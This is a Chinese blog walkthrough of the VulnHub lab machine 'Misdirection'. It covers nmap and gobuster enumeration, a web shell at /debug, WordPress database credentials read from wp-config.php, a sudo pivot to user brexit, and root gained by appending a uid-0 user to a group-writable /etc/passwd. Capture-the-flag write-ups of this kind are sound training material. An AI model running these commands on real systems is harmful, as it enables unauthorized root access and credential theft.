vulnhub靶机3(easy难度):misdirection(打点一秒钟,提权三小时)

已于 2024-09-09 14:56:55 修改
阅读量1k 收藏 29
点赞数 22
分类专栏: vulnhub oscp-like靶场 文章标签: 安全 网络 网络安全 web安全
于 2024-09-08 21:50:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142033814
版权

这台靶机的名字叫“误导”,字如其名,无数信息看似敏感实则无用

端口

nmap主机发现
nmap -sn 192.168.227.0/24
​
Nmap scan report for 192.168.227.74
Host is up (0.00020s latency).
​
74是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.227.74 --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT        STATE       SERVICE
22/tcp      open        ssh
80/tcp      open        http
3306/tcp    open        mysql   
8080/tcp    open        http    
​
​
发现开放4个端口
nmap -sT -sC -sV -O -p80 -oA nmap/scan 192.168.227.74详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ecbb44eef333af9fa5ceb5776145e436 (RSA)
|   256 677bcb4e951b78088d2ab147048d6287 (ECDSA)
|_  256 59041d25116d89a36c6de4e3d23cda7d (ED25519)
80/tcp   open  http    Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
​
端口信息太多,直接漏洞脚本扫描
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.227.74
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.227.74:80/init/default/elections
|     Form id: auth_user_email__row
|_    Form action: #
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/admin/: Possible admin folder
|   /admin/backup/: Possible backup
|   /admin/download/backup.sql: Possible database backup
|_  /examples/: Sample scripts
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.227.74:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.227.74:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|_    http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Felections%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /debug/: Potentially interesting folder
|   /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
​
值得注意的点:
80端口枚举出的目录和sql注入
3306端口说明部署了mysql服务
8080端口枚举出的目录,且是wordpress框架

立足点

网站信息收集
80端口是github上一个开源项目搭建的web服务
8080端口是wordpress服务(貌似访问不了blog,因为它的链接都是请求192.168.1.61这个地址,应该是靶机搭建时的固定ip)
目录扫描
扫描8080端口
gobuster dir -u http://192.168.227.74/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html --add-slash
​
/.php/                (Status: 403) [Size: 296]
/images/              (Status: 200) [Size: 745]
/help/                (Status: 200) [Size: 741]
/icons/               (Status: 403) [Size: 297]
/.html/               (Status: 403) [Size: 297]
/scripts/             (Status: 200) [Size: 747]
/css/                 (Status: 200) [Size: 739]
/wordpress/           (Status: 500) [Size: 2696]
/development/         (Status: 200) [Size: 755]
/manual/              (Status: 200) [Size: 745]
/js/                  (Status: 200) [Size: 737]
/shell/               (Status: 200) [Size: 743]
/debug/               (Status: 200) [Size: 12908]
/.html/               (Status: 403) [Size: 297]
/.php/                (Status: 403) [Size: 296]
/server-status/       (Status: 403) [Size: 305]
​
一个一个试,最后发现debug目录就是一个shell,啥信息都不用管了直接进去提权!!

提权(以下是试错过程,看正确提权直接跳过此步骤)

进去网站目录/var/www/html看一下,有没有配置内容

cd /var/www/html
​
css    development  images      js      scripts  wordpress
debug  help         index.html  manual  shell
​
发现wordpress直接进去看看,看到wp-config.php,进去直接拿到mysql登录凭据
define( 'DB_NAME', 'wp_myblog' );
​
/** MySQL database username */
define( 'DB_USER', 'blog' );
​
/** MySQL database password */
define( 'DB_PASSWORD', 'abcdefghijklmnopqrstuv' );

先不着急利用,先再收集其他信息

cat /etc/crontab 看一下计划任务发现什么都没有
uname -a 看一下linux版本为4.15
sudo -l 看一下发现
​
User www-data may run the following commands on localhost:
    (brexit) NOPASSWD: /bin/bash
​
cat /etc/passwd 看一下用户,确实有brexit这个用户,登录进去看看
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash

登录brexit

sudo -u brexit /bin/bash
​
在brexit用户文件夹/home/brexit发现了一个web2py的项目,google一下是个python的web框架,看看有没有配置信息。
​
在项目下看到web2py-scheduler.conf,看一下内容
web2py-scheduler.conf文件内容如下:
​
description "web2py task scheduler"
​
# INSTRUCTIONS:
# COPY THIS FILE IN:
#    /etc/init/web2py-scheduler.con
#
# To start/stop the scheduler, use
#   "sudo start web2py-scheduler"
#   "sudo stop web2py-scheduler"
#   "sudo status web2py-scheduler"
#
# YOU MAY HAVE TO EDIT PATH TO WEB2PY BELOW
​
start on (local-filesystems and net-device-up IFACE=eth0)
stop  on shutdown
​
# Give up if restart occurs 8 times in 60 seconds.                              
respawn limit 8 60
​
exec sudo -u www-data python /home/www-data/web2py/web2py.py -K parking > /tmp/scheduler.out
respawn
​
解析:这个是web2py框架的任务调度器,可以通过 sudo start/stop/status web2py-scheduler 来启动、停止和查看服务状态。该文件需要放在 /etc/init/web2py-scheduler.conf,这是 Linux 系统中常见的 Upstart 配置文件路径,用于管理系统服务的启动与停止。
​
它是通过www-data执行web2py.py脚本所以不能通过修改web2py.py脚本获取root权限。这个就是个误导项
更关键的是,以我们现在的权限,www-data和brexit用户都不能将其复制到/etc/init下

没什么办法就登录我们的mysql看看

使用密码凭据登录
mysql -u blog -p
abcdefghijklmnopqrstuv
​
数据库看了半天没有什么新发现,但是发现了wordpress博主admin的密码密文
admin : $P$BC4vcMsqXqr/cc46cx.E1arnrBq1yU/
​
抓到密文后先看看有没有必要破解密文,如果他是误导项直接排除即可
首先我们看看 /etc/passwd里有没有admin这个用户,发现没有直接排除

然后再看一看内核漏洞能不能提权

searchsploit linux 4.15
​
看到了可能的利用如下图

 

gcc编译一下传到c语言文件,传到靶机运行,提示没有glibc库
./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./pwn)
./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./pwn)
​
再试一试sh脚本能不能用,提示找不到gcc
Command 'gcc' not found
​
下载gcc也下不了没有权限

提权成功

最后,我们看一看对敏感文件的权限,权限配置出现错误也有机会提权

最主要的是看一看/etc/passwd能不能改,如果能更改我们就可以新添加一个root组的用户
​
ls -la /etc/ | grep passwd
​
-rwxrwxr--  1 root brexit     1786 Sep  8 12:21 passwd
-rw-r--r--  1 root root       1602 Jun  1  2019 passwd-
​
发现passwd文件所属组是brexit,而brexit组的用户可对passwd文件有任意权限,这下好办了,直接新建一个用户覆盖即可

新建用户并覆盖passwd(用户:pwned ,密码:qwerty)

openssl passwd -1 -salt pwned qwerty
输出:$1$pwned$M5PdlTdbF2x4W25c3mADr1
​
直接:echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd
不过这种方式不怎么好,建议把源文件先备份下来
​
cp /etc/passwd /tmp/passwd
echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd

切换用户

su pwned
passwd:qwerty
​
直接进入root权限
​
brexit@misdirection:~/web2py$ su hack
su pwned
Password: qwerty
​
root@misdirection:/home/brexit/web2py#

另外:这台机器还有另一种提权技巧,下一篇文章准备尝试那种提权技巧,是通过image进行提取,详细看https://benheater.com/vulnhub-misdirection-1/

anddddoooo
关注
专栏目录
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 683
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Misdirection 1--VulnHub系列学习记录
weixin_45509443的博客
07-25 321
了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式
vulnhub靶机Misdirection
0of_blog
05-01 786
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Vulnhub-靶机-Misdirection 1
qq_43264813的博客
01-27 697
Vulnhub靶机Misdirection 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/symfonos-52,415/ 文章目录Vulnhub靶机Misdirection 1一、信息收集二、漏洞利用、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全
红队打靶:Misdirection打靶思路详解(vulnhub
Bossfrank的博客
10-23 834
本文是vulnhub靶机Misdirection的详细打靶过程。靶机不难,关键点在于找到合适的突破口,不要在看似繁多的攻击面中徘徊。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等。
[VulnHub靶机渗透] Misdirection: 1
人若无名,便可专心练剑
02-10 927
靶机精讲之Misdirectionvulnhub靶机,不难,但开始阶段很容易被误导,渗透目标选择的优先级容易选错以致费时,死磕一点还是快速跳跃,需要权衡、经验和智慧。用webshell获得系统立足点,两次提权获得root权限。这台机器很标准,其中多了一点点曲折和趣味,是高仿真场景的抽象,规模不大,但渗透体验很棒,细节满满。
[VulnHub靶机渗透] dpwwn: 1
人若无名,便可专心练剑
02-07 1697
靶机精讲之dpwwn1,vulnhub靶机,很能体现思路为王的一台机器,艰难的撕口子过程全程展现,只希望你感同身受。直接告诉你怎么撕口子,你肯定觉得很简单,但就是这个方式,如果你偏偏想不到,那这台机器你难以为继。希望你借此机器,能够感同身受地思考你的渗透优先级选择和路径权衡。mysql空密码撕口子,自动任务提权。你能想到吗?少年!
Vulnhub靶机——EMPIRE: LUPINONE(PiP命令提权
流水不争先,争的是滔滔不绝
04-09 1133
Vulnhub靶机——EMPIRE: LUPINONE——PiP命令提权(sudo)
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1247
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 1025
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2000
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
什么是网络安全
m0_66268916的博客
10-07 546
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 400
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 312
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
msvcr100.dll丢失的解决方法,如何安全下载 msvcr100.dll 文件:完全指南
最新发布
电脑修复君的博客
10-11 653
在使用 Windows 操作系统的电脑上运行某些程序或游戏时,可能会遇到一个常见的错误消息,提示缺少 msvcr100.dll 文件。这个 DLL 文件是 Microsoft Visual C++ 2010 Redistributable Package 的一部分,对于运行依赖于 C++ 的软件来说至关重要。如果你正面临 msvcr100.dll 缺失的问题,本文将引导你如何安全地下载并恢复 msvcr100.dll 文件,确保你的应用程序可以顺利运行。
数据中心物理安全的历史和演变
网络研究观
10-10 903
在当今的数字时代,数据中心托管已成为我们互联世界的支柱。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值